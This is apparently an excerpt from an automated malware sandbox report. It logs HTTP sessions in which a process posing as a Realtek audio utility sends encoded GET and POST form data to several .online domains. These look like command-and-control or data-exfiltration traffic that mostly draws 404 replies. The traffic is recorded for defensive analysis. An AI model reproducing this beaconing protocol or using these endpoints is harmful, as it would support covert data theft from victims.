                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  36192.168.11.304990131.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:49:58.968054056 CET413OUTGET /227m/?6aonl5x=zu1kjW5LnnBHDrOoJJXjEyap72qsvzZWMrrFEEjR4VpE0fuyjq12ZNIz8+5tcycS4E2gPV8m77870zUeK486K4PDE8XvvsLaWTViceKvZ+jMyMjrF9JiWcw=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.hemph.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:49:59.191601038 CET733INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:49:59 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  37192.168.11.304990231.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:04.785099983 CET696OUTPOST /vxxt/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bootleggersrt.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.bootleggersrt.online
                                                                                                  Referer: http://www.bootleggersrt.online/vxxt/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 75 4f 47 63 6d 32 73 41 79 48 70 30 4c 57 73 37 72 6e 4a 39 4f 67 66 55 74 6b 7a 2f 44 6f 41 45 2f 79 78 35 6c 73 67 41 4c 59 66 54 74 45 49 2b 64 68 62 4f 49 56 61 58 4a 34 48 6f 62 30 6a 31 68 4e 66 52 37 78 61 55 36 44 74 5a 6a 66 65 4a 50 59 7a 34 42 77 53 66 4c 43 70 2f 5a 33 57 50 71 34 74 39 72 37 77 4e 51 74 55 74 64 78 34 43 38 41 75 4a 74 39 4d 33 44 30 2b 71 67 31 4c 79 35 37 36 65 6a 5a 53 31 6e 75 45 56 73 33 4d 7a 59 67 6e 4a 2f 53 64 6d 30 48 42 67 64 34 73 78 56 2b 49 77 2b 6e 50 56 50 2f 71 67 54 50 73 6c 72 62 4e 4d 44 64 46 32 44 55 6c 55 44 2b 37 2b 50 77 3d 3d
                                                                                                  Data Ascii: 6aonl5x=uOGcm2sAyHp0LWs7rnJ9OgfUtkz/DoAE/yx5lsgALYfTtEI+dhbOIVaXJ4Hob0j1hNfR7xaU6DtZjfeJPYz4BwSfLCp/Z3WPq4t9r7wNQtUtdx4C8AuJt9M3D0+qg1Ly576ejZS1nuEVs3MzYgnJ/Sdm0HBgd4sxV+Iw+nPVP/qgTPslrbNMDdF2DUlUD+7+Pw==
                                                                                                  Dec 3, 2024 09:50:05.006167889 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:50:04 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  38192.168.11.304990331.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:07.544234037 CET716OUTPOST /vxxt/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bootleggersrt.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.bootleggersrt.online
                                                                                                  Referer: http://www.bootleggersrt.online/vxxt/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 75 4f 47 63 6d 32 73 41 79 48 70 30 4b 33 63 37 34 55 68 39 65 77 66 62 69 45 7a 2f 49 49 41 41 2f 79 74 35 6c 70 41 51 4b 71 4c 54 73 6d 51 2b 50 51 62 4f 4c 56 61 58 43 59 48 70 44 55 6a 71 68 4e 54 6a 37 78 57 55 36 44 52 5a 6a 66 75 4a 50 70 7a 2f 41 67 53 64 44 69 70 35 48 48 57 50 71 34 74 39 72 2f 59 72 51 74 63 74 42 51 49 43 39 6a 32 49 79 4e 4d 34 4c 55 2b 71 6b 31 4c 32 35 37 37 39 6a 62 72 75 6e 6f 41 56 73 32 38 7a 59 31 4c 4b 6d 69 64 73 72 33 42 30 52 64 5a 59 4c 4b 46 41 33 47 66 37 43 2b 32 56 53 59 42 2f 32 59 35 4f 51 39 35 62 66 56 49 38 42 38 36 6c 53 38 37 6a 59 6e 32 59 50 2b 4b 4c 67 75 59 4c 71 79 4f 72 78 66 55 3d
                                                                                                  Data Ascii: 6aonl5x=uOGcm2sAyHp0K3c74Uh9ewfbiEz/IIAA/yt5lpAQKqLTsmQ+PQbOLVaXCYHpDUjqhNTj7xWU6DRZjfuJPpz/AgSdDip5HHWPq4t9r/YrQtctBQIC9j2IyNM4LU+qk1L25779jbrunoAVs28zY1LKmidsr3B0RdZYLKFA3Gf7C+2VSYB/2Y5OQ95bfVI8B86lS87jYn2YP+KLguYLqyOrxfU=
                                                                                                  Dec 3, 2024 09:50:07.793020964 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:50:07 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  39192.168.11.304990431.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:10.294321060 CET1289OUTPOST /vxxt/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bootleggersrt.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.bootleggersrt.online
                                                                                                  Referer: http://www.bootleggersrt.online/vxxt/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 75 4f 47 63 6d 32 73 41 79 48 70 30 4b 33 63 37 34 55 68 39 65 77 66 62 69 45 7a 2f 49 49 41 41 2f 79 74 35 6c 70 41 51 4b 71 7a 54 74 54 45 2b 64 48 50 4f 4b 56 61 58 65 6f 48 6b 44 55 69 77 68 4e 36 71 37 78 4b 71 36 46 64 5a 79 4d 57 4a 4a 62 4c 2f 4c 67 53 64 63 79 70 34 5a 33 58 53 71 34 39 35 72 37 45 72 51 74 63 74 42 54 41 43 36 77 75 49 70 4e 4d 33 44 30 2b 6d 67 31 4c 4f 35 37 53 47 6a 64 33 2b 6e 71 51 56 73 42 51 7a 59 44 2f 4b 6d 69 64 73 69 58 42 33 52 64 64 64 4c 4b 38 42 33 48 48 46 43 50 53 56 53 34 4d 55 79 35 31 42 4c 72 68 55 51 57 73 4b 56 4e 47 52 4e 74 6a 38 52 32 6d 39 4d 75 6d 6a 75 62 51 53 76 67 43 54 70 34 32 38 6d 49 4a 4d 4e 4c 6e 50 4c 4c 57 76 70 44 4b 4f 4a 37 44 34 42 32 66 5a 44 41 58 6a 58 69 72 6f 50 67 43 68 73 36 44 74 4d 46 6b 55 45 7a 57 4e 2b 41 4a 66 74 51 69 4e 4e 6b 4f 67 31 73 6a 6b 47 6c 56 76 74 37 68 38 48 30 61 58 6a 62 30 74 5a 71 4c 44 6a 2f 64 6f 56 32 36 7a 70 37 33 4d 36 74 31 4a 67 6b 49 31 76 4f 75 6b 61 50 6e 69 74 59 [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=uOGcm2sAyHp0K3c74Uh9ewfbiEz/IIAA/yt5lpAQKqzTtTE+dHPOKVaXeoHkDUiwhN6q7xKq6FdZyMWJJbL/LgSdcyp4Z3XSq495r7ErQtctBTAC6wuIpNM3D0+mg1LO57SGjd3+nqQVsBQzYD/KmidsiXB3RdddLK8B3HHFCPSVS4MUy51BLrhUQWsKVNGRNtj8R2m9MumjubQSvgCTp428mIJMNLnPLLWvpDKOJ7D4B2fZDAXjXiroPgChs6DtMFkUEzWN+AJftQiNNkOg1sjkGlVvt7h8H0aXjb0tZqLDj/doV26zp73M6t1JgkI1vOukaPnitY14S/YyM2MPUhW80waieh55o44BRZ8hS/se6QT/qTZCiG4sZr7d/nlZTWXxfvEfq1LpD28GnDeTVXmEsnO7MXsdG+t26uEDCmcDTNkTWNu62zXxaCdp90nyfxuawEZxTi3Sk8ghMZDIzftlTURaU6wp+kZKW0r2kTIvOtyZQnHkCYWRXbfzYCQjnUWdfTJ2/OTw9SiNYEvPC1R4fisc+xQdDOZuCnzZGWSlk/cP0o//VBVLDGEllv59VI+EsJ0zGtC8tJirgVjUewuhJrDVVth2sPo1Bw+rg8jEkdq722dUgsZ1sf+ur0k5J43BW2mboONrR5QeJIXu5qHRW8NQhpEgDQdW+/01ABfpf4qcpUDFEpz4xuIYBzcJ8NXIp65zv9MXZ0ojhs6fmrIvDvCd7QxKrAcLCa1MKcEfTKj6Kv1PRfLvQsAKYIViJ6sPf+Ydq164RrdbPizk
                                                                                                  Dec 3, 2024 09:50:10.294369936 CET2544OUTData Raw: 57 73 42 75 4d 70 6a 55 35 72 32 32 68 4d 75 52 66 44 69 67 74 4c 67 6d 47 75 72 36 76 69 75 4c 57 49 72 34 34 37 65 61 59 2f 59 4e 47 38 77 6b 4c 6b 42 69 76 62 6a 45 47 75 58 50 63 6e 7a 59 4a 74 51 78 4a 4d 71 68 6d 47 46 5a 46 75 52 72 6b 6e
                                                                                                  Data Ascii: WsBuMpjU5r22hMuRfDigtLgmGur6viuLWIr447eaY/YNG8wkLkBivbjEGuXPcnzYJtQxJMqhmGFZFuRrkntjEooyZJ6WwDiZC2ILtnGugyqML9p7V1/HNz5J2iVhfAyFHgMCL6m2w7q6d4+gsi2jMaxFbVLwyFwXasb8oQpY00cZqz5zPvtOQxBDN825EjiTIWgIcNPEIfPEAs+Xbyekcn5NriPm5LHJyJ1vXWCpOfbh1ehdjv7
                                                                                                  Dec 3, 2024 09:50:10.535849094 CET375INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:50:10 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Content-Encoding: gzip
                                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  40192.168.11.304990531.31.196.17805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:13.040489912 CET421OUTGET /vxxt/?6aonl5x=jMu8lGE22mRQMFkA02Z4QgHVvRKiIIAfjF1Au58NL63AyUoRBgSkNxa8Io3HGFLKqYvOjgOM4kRS/vuEKI7jIA/GEFV6EXDHqvtGhZ86XLQwQ00v5R3xroM=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.bootleggersrt.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:50:13.261023045 CET733INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx
                                                                                                  Date: Tue, 03 Dec 2024 08:50:13 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                                                                  Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  41192.168.11.3049906172.67.159.24805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:18.497157097 CET699OUTPOST /j7ub/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.rafconstrutora.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.rafconstrutora.online
                                                                                                  Referer: http://www.rafconstrutora.online/j7ub/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 42 31 64 50 67 67 4d 62 38 66 39 6c 4d 44 6c 32 5a 4d 4b 44 50 34 6e 48 53 44 4d 46 61 55 30 48 79 52 69 43 45 45 6c 55 41 34 55 4c 47 2b 44 37 56 46 4c 6f 6b 47 4d 54 45 2b 45 39 71 6f 35 48 4c 2b 46 74 58 4b 6c 51 5a 7a 74 53 44 44 61 55 74 63 79 53 57 41 77 51 38 48 4e 4b 31 4c 69 79 72 6b 72 61 4a 72 38 31 42 34 71 31 6c 35 78 6f 63 34 72 72 71 6e 67 67 77 4f 4a 68 41 2b 2b 48 4d 57 76 38 56 47 64 2b 34 56 6a 78 62 43 47 63 41 62 5a 6d 72 33 59 74 54 70 58 6f 53 56 34 54 30 47 49 38 43 6b 2f 4d 73 38 33 6e 50 62 4c 73 68 63 47 6c 6d 6c 54 39 4c 4e 2b 41 79 65 6a 37 33 41 3d 3d
                                                                                                  Data Ascii: 6aonl5x=B1dPggMb8f9lMDl2ZMKDP4nHSDMFaU0HyRiCEElUA4ULG+D7VFLokGMTE+E9qo5HL+FtXKlQZztSDDaUtcySWAwQ8HNK1LiyrkraJr81B4q1l5xoc4rrqnggwOJhA++HMWv8VGd+4VjxbCGcAbZmr3YtTpXoSV4T0GI8Ck/Ms83nPbLshcGlmlT9LN+Ayej73A==
                                                                                                  Dec 3, 2024 09:50:18.670939922 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:50:18 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Blkhi8mNMCu0upY65H7YkYIyP7pz6fCAfqBIDNZFEmT5%2BW0p%2FqayhfLsfmKHgtEuLe%2B%2F4ceF6LyYkcCPjZMZu%2BHe%2FfezwDCy%2FiGwg7UTQf0cu1lMpNPqeYmYQL0qi8Sn1gjcayRQHdDamXFp"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec24ef1e841435b-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102753&min_rtt=102753&rtt_var=51376&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=699&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 [TRUNCATED]
                                                                                                  Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-
                                                                                                  Dec 3, 2024 09:50:18.670948982 CET436INData Raw: 53 75 5d a2 f4 d4 e8 42 3e 52 c2 f8 4c c2 b8 0b a3 f1 b3 a6 98 9e a9 98 46 5d 38 7d 5e 15 8b 33 15 8b 71 17 2e ce 54 9c b1 34 73 b0 22 f2 ec 9d aa 47 95 b1 23 cd 2c f6 ed f2 77 25 72 81 e8 ff 13 b1 26 eb f9 ff 85 ea 86 3d 55 bf 5d 8d af fe 25 3e
                                                                                                  Data Ascii: Su]B>RLF]8}^3q.T4s"G#,w%r&=U]%>r343-R1'kWq_eAJNO=0Io#_A19#ok\O}NU;dVPoscEWCp wVKz =tddX;4y6J
                                                                                                  Dec 3, 2024 09:50:18.671013117 CET22INData Raw: 63 0d 0a e3 e5 02 00 66 df cc 8d 39 09 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: cf90


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  42192.168.11.3049907172.67.159.24805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:50:21.127060890 CET719OUTPOST /j7ub/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.rafconstrutora.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.rafconstrutora.online
                                                                                                  Referer: http://www.rafconstrutora.online/j7ub/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
